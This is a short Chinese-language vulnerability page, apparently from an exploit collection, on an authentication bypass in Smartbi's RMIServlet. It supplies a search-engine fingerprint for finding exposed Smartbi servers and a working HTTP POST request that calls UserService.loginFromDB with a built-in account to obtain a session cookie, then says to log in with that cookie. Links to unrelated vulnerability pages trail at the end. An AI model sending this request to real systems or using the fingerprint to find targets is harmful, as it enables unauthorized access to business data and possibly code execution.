# smartbi RMIServlet 登陆绕过漏洞

# 漏洞描述

Smartbi在安装时会内置几个用户，在使用特定接口时，可绕过用户身份认证机制获取其身份凭证，随后可使用获取的身份凭证调用后台接口，可能导致敏感信息泄露和代码执行。

# 漏洞影响

smartbi

# 网络测绘

app="SMARTBI"

# 漏洞复现

产品页面

验证POC

POST /vision/RMIServlet HTTP/1.1
Host: 
Accept: */*
Content-Type: application/x-www-form-urlencoded

className=UserService&methodName=loginFromDB&params=["service","0a"]

1
2
3
4
5
6

通过获取的Cookie登陆

飞视美视频会议系统 Struts2 远程命令执行漏洞 Konga 普通用户越权获取管理员权限漏洞